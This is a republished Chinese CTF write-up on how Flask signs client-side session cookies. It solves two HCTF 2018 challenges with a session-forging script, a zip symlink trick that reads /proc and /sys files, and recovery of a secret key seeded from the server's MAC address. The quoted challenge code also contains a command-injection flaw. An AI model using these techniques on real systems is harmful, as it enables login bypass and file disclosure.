26

从HCTF两道Web题谈谈flask客户端session机制

 5 years ago
source link: https://www.anquanke.com/post/id/163975?amp%3Butm_medium=referral
Go to the source link to view the article. You can view the picture content, updated content and better typesetting reading experience. If the link is broken, please click the button below to view the snapshot at that time.

m6jeMj6.jpg!web

这次hctf中有两道获取flask的secret_key生成客户端session的题目,为了能做出这两道题目来也是深入研究了一下flask客户端session的生成机制。所以这篇文章主要详细讨论一下flask客户端session的生成以及校验过程,以及在了解了flask客户端session机制后这两道题的解法。

个人第一次见到关于客户端session的文章是pith0n师傅的一片文章 客户端session导致的安全问题 。然而做题的时候只看phith0n师傅的这篇文章感觉还是有点儿懵逼。。。(也可能是我太菜了233)所以就只能翻flask的源码跟了一遍flask对session的处理流程。

flask对客户端session的处理机制

flask对session的处理位于flask/sessions.py中,默认情况下flask的session以cookie的形式保存于客户端,利用签名机制来防止数据被篡改。

在flask/sessions.py中,SecureCookieSessionInterface用于封装对CookieSession的一系列操作:

class SecureCookieSessionInterface(SessionInterface):
    """The default session interface that stores sessions in signed cookies
    through the :mod:`itsdangerous` module.
    """
    # salt,默认为cookie-session
    salt = 'cookie-session'
    #: 默认哈希函数为hashlib.sha1
    digest_method = staticmethod(hashlib.sha1)
    #:默认密钥推导方式 :hmac
    key_derivation = 'hmac'
    #:默认序列化方式:session_json_serializer
    serializer = session_json_serializer
    session_class = SecureCookieSession

这里默认的序列化方式的定义为:

session_json_serializer = TaggedJSONSerializer()

可以看到默认使用taggedJSONSerializer做序列化

taggedJSONSerializer定义:

class TaggedJSONSerializer(object):
    """A customized JSON serializer that supports a few extra types that
    we take for granted when serializing (tuples, markup objects, datetime).
    """
    def dumps(self, value):
        def _tag(value):
            if isinstance(value, tuple):
                return {' t': [_tag(x) for x in value]}
            elif isinstance(value, uuid.UUID):
                return {' u': value.hex}
            elif isinstance(value, bytes):
                return {' b': b64encode(value).decode('ascii')}
            elif callable(getattr(value, '__html__', None)):
                return {' m': text_type(value.__html__())}
            elif isinstance(value, list):
                return [_tag(x) for x in value]
            elif isinstance(value, datetime):
                return {' d': http_date(value)}
            elif isinstance(value, dict):
                return dict((k, _tag(v)) for k, v in iteritems(value))
            elif isinstance(value, str):
                try:
                    return text_type(value)
                except UnicodeError:
                    raise UnexpectedUnicodeError(u'A byte string with '
                        u'non-ASCII data was passed to the session system '
                        u'which can only store unicode strings.  Consider '
                        u'base64 encoding your string (String was %r)' % value)
            return value
        return json.dumps(_tag(value), separators=(',', ':'))

    def loads(self, value):
        def object_hook(obj):
            if len(obj) != 1:
                return obj
            the_key, the_value = next(iteritems(obj))
            if the_key == ' t':
                return tuple(the_value)
            elif the_key == ' u':
                return uuid.UUID(the_value)
            elif the_key == ' b':
                return b64decode(the_value)
            elif the_key == ' m':
                return Markup(the_value)
            elif the_key == ' d':
                return parse_date(the_value)
            return obj
        return json.loads(value, object_hook=object_hook)

可以看到本质还是一个添加了类型属性的json处理。

SecureCookieSessionInterface类的获取签名验证序列化器函数为get_signing_serializer

def get_signing_serializer(self, app):
        if not app.secret_key:
            return None
        signer_kwargs = dict(
            key_derivation=self.key_derivation,
            digest_method=self.digest_method
        )
        return URLSafeTimedSerializer(app.secret_key, salt=self.salt,
                                      serializer=self.serializer,
                                      signer_kwargs=signer_kwargs)

可以看到最后使用的签名序列化器为URLSafeTimedSerializer,并且传入app.secret_key用于签名。

SecureCookieSessionInterface的open_session与save_session方法表示了对session的处理

def open_session(self, app, request):
        s = self.get_signing_serializer(app)
        if s is None:
            return None
        val = request.cookies.get(app.session_cookie_name)
        if not val:
            return self.session_class()
        max_age = total_seconds(app.permanent_session_lifetime)
        try:
            data = s.loads(val, max_age=max_age)#max_age
            return self.session_class(data)
        except BadSignature:
            return self.session_class()

    def save_session(self, app, session, response):
        domain = self.get_cookie_domain(app)
        path = self.get_cookie_path(app)
        if not session:
            if session.modified:
                response.delete_cookie(app.session_cookie_name,
                                       domain=domain, path=path)
            return
        httponly = self.get_cookie_httponly(app)
        secure = self.get_cookie_secure(app)
        expires = self.get_expiration_time(app, session)
        print self.get_signing_serializer(app)
        val = self.get_signing_serializer(app).dumps(dict(session))
        response.set_cookie(app.session_cookie_name, val,
                            expires=expires, httponly=httponly,
                            domain=domain, path=path, secure=secure)

可以看到从客户端获取session时获取对应的cookie值,并使用序列化器序列化,能够成功序列化即可获取sesison_class,否则返回一个空的session_class.

SecureCookieSession使用的默认序列化器URLSafeTimedSeriallizer位于itsdangerous模块中:

class URLSafeTimedSerializer(URLSafeSerializerMixin, TimedSerializer):
    """Works like :class:`TimedSerializer` but dumps and loads into a URL
    safe string consisting of the upper and lowercase character of the
    alphabet as well as ``'_'``, ``'-'`` and ``'.'``.
    """
    default_serializer = compact_json

序列化的流程在TimedSerializer的父类Serializer中

def dumps(self, obj, salt=None):
        """Returns a signed string serialized with the internal serializer.
        The return value can be either a byte or unicode string depending
        on the format of the internal serializer.
        """
        payload = want_bytes(self.dump_payload(obj))
        rv = self.make_signer(salt).sign(payload)
        if self.is_text_serializer:
            rv = rv.decode('utf-8')
        return rv

可以看到主要处理流程是将obj用dump_payload签名后利用make_signer(salt)生成的signer进行签名处理,并返回签名后的结果即为我们所需要的cookie值,而URLSafeTimedSeralizer的dump_playload方法继承自URLSafeSerializerMixin的dump_payload方法

def dump_payload(self, obj):
        json = super(URLSafeSerializerMixin, self).dump_payload(obj)
        is_compressed = False
        compressed = zlib.compress(json)
        if len(compressed) < (len(json) - 1):
            json = compressed
            is_compressed = True
        base64d = base64_encode(json)
        if is_compressed:
            base64d = b'.' + base64d
        return base64d

对obj的处理首先使用URLSafeTimedSeralizer的另一个父类TimedSeralizer继承自Seralizer的dump_payload方法处理

def dump_payload(self, obj):
        """Dumps the encoded object.  The return value is always a
        bytestring.  If the internal serializer is text based the value
        will automatically be encoded to utf-8.
        """
        return want_bytes(self.serializer.dumps(obj))

其中self.serializer为之前SecureCookieSessionInterface的get_signing_serializer传入,即taggedJSONSerializer。

处理之后如果长度过长会进行一次zlib压缩,最后将生成的数据base64编码。

再回到之前Seralizer的dumps的处理流程中,self.make_signer(salt)的定义如下:

def make_signer(self, salt=None):
        """A method that creates a new instance of the signer to be used.
        The default implementation uses the :class:`Signer` baseclass.
        """
        if salt is None:
            salt = self.salt
        return self.signer(self.secret_key, salt=salt, **self.signer_kwargs)

self.salt、self.signer_kwargs、self.secret_key来自之前SecureCookieSessionInterface的get_signing_serializer传入,分别为app.secret_key、’cookie-session’、{‘key_derivation’:’hmac’,’digest_method’=staticmethod(hashlib.sha1)},而self.signer为TimedSeralizer中指定

class TimedSerializer(Serializer):
    """Uses the :class:`TimestampSigner` instead of the default
    :meth:`Signer`.
    """

    default_signer = TimestampSigner

TimestampSigner签名过程为:

def sign(self, value):
        """Signs the given string and also attaches a time information."""
        value = want_bytes(value)
        timestamp = base64_encode(int_to_bytes(self.get_timestamp()))
        sep = want_bytes(self.sep)
        value = value + sep + timestamp
        return value + sep + self.get_signature(value)

将传入的value拼接上时间戳之后再拼接签名内容,签名实现继承自Signer类的get_signature方法

def get_signature(self, value):
        """Returns the signature for the given value"""
        value = want_bytes(value)
        key = self.derive_key()
        sig = self.algorithm.get_signature(key, value)
        return base64_encode(sig)

因此,整个序列化的流程便是将obj处理为json格式后根据长度选择是否zlib压缩,之后再进行base64加密,拼接上当前时间戳之后再使用hmac签名并且拼接到该字符串上即为我们所需要的payload。

反序列化

反签名的流程主要为TimedSerializer类的loads函数

class TimedSerializer(Serializer):
    """Uses the :class:`TimestampSigner` instead of the default
    :meth:`Signer`.
    """

    default_signer = TimestampSigner

    def loads(self, s, max_age=None, return_timestamp=False, salt=None):
        """Reverse of :meth:`dumps`, raises :exc:`BadSignature` if the
        signature validation fails.  If a `max_age` is provided it will
        ensure the signature is not older than that time in seconds.  In
        case the signature is outdated, :exc:`SignatureExpired` is raised
        which is a subclass of :exc:`BadSignature`.  All arguments are
        forwarded to the signer's :meth:`~TimestampSigner.unsign` method.
        """
        base64d, timestamp = self.make_signer(salt) 
            .unsign(s, max_age, return_timestamp=True)
        payload = self.load_payload(base64d)
        if return_timestamp:
            return payload, timestamp
        return payload

    def loads_unsafe(self, s, max_age=None, salt=None):
        load_kwargs = {'max_age': max_age}
        load_payload_kwargs = {}
        return self._loads_unsafe_impl(s, salt, load_kwargs, load_payload_kwargs)

这里的loads部分使用TimestampSigner来对传入的数据进行解析,查看TimestampSinger中关于签名与反签名的源码:

def sign(self, value):
        """Signs the given string and also attaches a time information."""
        value = want_bytes(value)
        timestamp = base64_encode(int_to_bytes(self.get_timestamp()))
        sep = want_bytes(self.sep)
        value = value + sep + timestamp
        return value + sep + self.get_signature(value)

       def unsign(self, value, max_age=None, return_timestamp=False):
        """Works like the regular :meth:`~Signer.unsign` but can also
        validate the time.  See the base docstring of the class for
        the general behavior.  If `return_timestamp` is set to `True`
        the timestamp of the signature will be returned as naive
        :class:`datetime.datetime` object in UTC.
        """
        try:
            result = Signer.unsign(self, value)
            sig_error = None
        except BadSignature as e:
            sig_error = e
            result = e.payload or b''
        sep = want_bytes(self.sep)

        # If there is no timestamp in the result there is something
        # seriously wrong.  In case there was a signature error, we raise
        # that one directly, otherwise we have a weird situation in which
        # we shouldn't have come except someone uses a time-based serializer
        # on non-timestamp data, so catch that.
        if not sep in result:
            if sig_error:
                raise sig_error
            raise BadTimeSignature('timestamp missing', payload=result)

        value, timestamp = result.rsplit(sep, 1)
        try:
            timestamp = bytes_to_int(base64_decode(timestamp))
        except Exception:
            timestamp = None

        # Signature is *not* okay.  Raise a proper error now that we have
        # split the value and the timestamp.
        if sig_error is not None:
            raise BadTimeSignature(text_type(sig_error), payload=value,
                                   date_signed=timestamp)

        # Signature was okay but the timestamp is actually not there or
        # malformed.  Should not happen, but well.  We handle it nonetheless
        #检查timestamp
        if timestamp is None:
            raise BadTimeSignature('Malformed timestamp', payload=value)

        # Check timestamp is not older than max_age
        if max_age is not None:
            age = self.get_timestamp() - timestamp
            if age > max_age:
                raise SignatureExpired(
                    'Signature age %s > %s seconds' % (age, max_age),
                    payload=value,
                    date_signed=self.timestamp_to_datetime(timestamp))

        if return_timestamp:
            return value, self.timestamp_to_datetime(timestamp)
        return value

unsigin过程直接调用父类Signer的unsign,再进行timestamp的检查,由于之前调用时传入了max_age所以会检查timestamp是否超时(当时没注意到这一点一直以为随便一个timestamp就可以结果gg了。。。)

序列化与反序列化的总结

最后经过flask处理的字符串的格式为:

json->zlib->base64后的源字符串 . 时间戳 . hmac签名信息

对于以上的调用我们可以总结为这样的代码(与服务器上的python版本无关,如果不确定服务器运行环境timestamp最好根据服务器反馈获取):

from itsdangerous import *
from flask.sessions import *


key='*******'
salt="cookie-session"
serializer=session_json_serializer
digest_method=hashlib.sha1
key_derivation='hmac'

signer_kwargs = dict(
            key_derivation=key_derivation,
            digest_method=digest_method
        )


def serialize(obj,timestamp,sep):
        my_serializer=URLSafeTimedSerializer(key,salt=salt,serializer=serializer,signer_kwargs=signer_kwargs)
        base64d=my_serializer.dump_payload(obj) #数据压缩
        data=base64d+sep+timestamp #拼接timestamp
        result=data+sep+my_serializer.make_signer(salt).get_signature(data) #拼接签名内容
        return result

而从cookie获取session的过程便是验证签名->验证是否过期->解码,解码可以使用phith0n师傅的payload:

#!/usr/bin/env python3
import sys
import zlib
from base64 import b64decode
from flask.sessions import session_json_serializer
from itsdangerous import base64_decode

def decryption(payload):
    payload, sig = payload.rsplit(b'.', 1)
    payload, timestamp = payload.rsplit(b'.', 1)

    decompress = False
    if payload.startswith(b'.'):
        payload = payload[1:]
        decompress = True

    try:
        payload = base64_decode(payload)
    except Exception as e:
        raise Exception('Could not base64 decode the payload because of '
                         'an exception')

    if decompress:
        try:
            payload = zlib.decompress(payload)
        except Exception as e:
            raise Exception('Could not zlib decompress the payload before '
                             'decoding the payload')

    return session_json_serializer.loads(payload)

if __name__ == '__main__':
    print(decryption(sys.argv[1].encode()))

需要特别注意的是python2与python3下产生的timestamp是不一样的!!!当时被这个问题坑了很久。。。

hctf两道题目的wp

有了以上的分析要解决hctf的这两道题目就很容易了:

http://admin.2018.hctf.io/index

这道题目我们能做出来是因为在github上搜索hctf,按照recent updated得到了题目的repo https://github.com/woadsl1234/hctf_flask

repo中暴露了私钥信息,而且题目只需要能用admin用户登入即可,因此可以直接使用上面的脚本跑出admin用户的session来。

hide and seek

http://hideandseek.2018.hctf.io/

这道题目中登入后会要求我们上传一个zip文件,如果zip文件内的所有文件都是文本文件便可以成功返回文件的内容。

然而zip文件中也可以包含软链接,采用zip -ry out.zip link即可将一个软链接打包到out.zip中。因此我们可以尝试上传包含/proc/self/environ软链接的压缩包来获取一些运行环境信息

ln -s /proc/self/environ link
zip -ry out.zip link

上传后可以获得当前一些环境信息:

Evy6Bz2.png!web 可以发现uwsgi配置文件的路径/app/it_is_hard_t0_guess_the_path_but_y0u_find_it_5f9s5b5s9.ini,尝试读取配置文件

[uwsgi]
module = hard_t0_guess_n9f5a95b5ku9fg.hard_t0_guess_also_df45v48ytj9_main
callable=app

可以得知当前脚本为/app/hard_t0_guess_n9f5a95b5ku9fg/hard_t0_guess_also_df45v48ytj9_main.py

从而获取到源码

# -*- coding: utf-8 -*-
from flask import Flask,session,render_template,redirect, url_for, escape, request,Response
import uuid
import base64
import random
import flag
from werkzeug.utils import secure_filename
import os
random.seed(uuid.getnode())
app = Flask(__name__)
app.config['SECRET_KEY'] = str(random.random()*100)
app.config['UPLOAD_FOLDER'] = './uploads'
app.config['MAX_CONTENT_LENGTH'] = 100 * 1024
ALLOWED_EXTENSIONS = set(['zip'])

def allowed_file(filename):
    return '.' in filename and 
           filename.rsplit('.', 1)[1].lower() in ALLOWED_EXTENSIONS


@app.route('/', methods=['GET'])
def index():
    error = request.args.get('error', '')
    if(error == '1'):
        session.pop('username', None)
        return render_template('index.html', forbidden=1)

    if 'username' in session:
        return render_template('index.html', user=session['username'], flag=flag.flag)
    else:
        return render_template('index.html')


@app.route('/login', methods=['POST'])
def login():
    username=request.form['username']
    password=request.form['password']
    if request.method == 'POST' and username != '' and password != '':
        if(username == 'admin'):
            return redirect(url_for('index',error=1))
        session['username'] = username
    return redirect(url_for('index'))


@app.route('/logout', methods=['GET'])
def logout():
    session.pop('username', None)
    return redirect(url_for('index'))

@app.route('/upload', methods=['POST'])
def upload_file():
    if 'the_file' not in request.files:
        return redirect(url_for('index'))
    file = request.files['the_file']
    if file.filename == '':
        return redirect(url_for('index'))
    if file and allowed_file(file.filename):
        filename = secure_filename(file.filename)
        file_save_path = os.path.join(app.config['UPLOAD_FOLDER'], filename)
        if(os.path.exists(file_save_path)):
            return 'This file already exists'
        file.save(file_save_path)
    else:
        return 'This file is not a zipfile'


    try:
        extract_path = file_save_path + '_'
        os.system('unzip -n ' + file_save_path + ' -d '+ extract_path)
        read_obj = os.popen('cat ' + extract_path + '/*')
        file = read_obj.read()
        read_obj.close()
        os.system('rm -rf ' + extract_path)
    except Exception as e:
        file = None

    os.remove(file_save_path)
    if(file != None):
        if(file.find(base64.b64decode('aGN0Zg==').decode('utf-8')) != -1):
            return redirect(url_for('index', error=1))
    return Response(file)


if __name__ == '__main__':
    #app.run(debug=True)
    app.run(host='127.0.0.1', debug=True, port=10008)

然而并无法获取flag.py的源码,因为限制了内容不能包含hctf。

尝试获取/app/hard_t0_guess_n9f5a95b5ku9fg/templates/index.html

可以得知只要能用admin登入即可获得flag.

这里我们重点查看payload中SECRET_KEY的生成方式

random.seed(uuid.getnode())
app = Flask(__name__)
app.config['SECRET_KEY'] = str(random.random()*100)

可以看到随机数的种子为uuid.getnode().而uuid.getnode()函数返回的便是当前网卡的mac地址。那么要怎样获取服务器上的网卡地址?

这里便可以通过linux强大的特殊文件系统来获取。首先利用之前的方法读取/proc/net/dev可以发现服务器上的所有网卡。可以发现服务器只有eth0和lo两个网卡。之后再读取/sys/class/net/eth0/address

即可获取eth0网卡的mac地址。获取了地址,我们便获取了SECRET_KEY,之后便可以使用我们上面的payload来伪造session从二获取flag。

后记

通过这次hctf深入的了解了flask的客户端session的生成过程,可以说hctf相比最近的一些神仙大战确实是异常很适合web狗的比赛了。每年的hctf都能学到一些东西,希望以后能多一些这样干货满满的比赛。○| ̄|_

ps:如果出一道改了源码改了默认salt和签名机制的题目会不会被打死ヾ(≧∇≦*)ゝ


About Joyk


Aggregate valuable and interesting links.
Joyk means Joy of geeK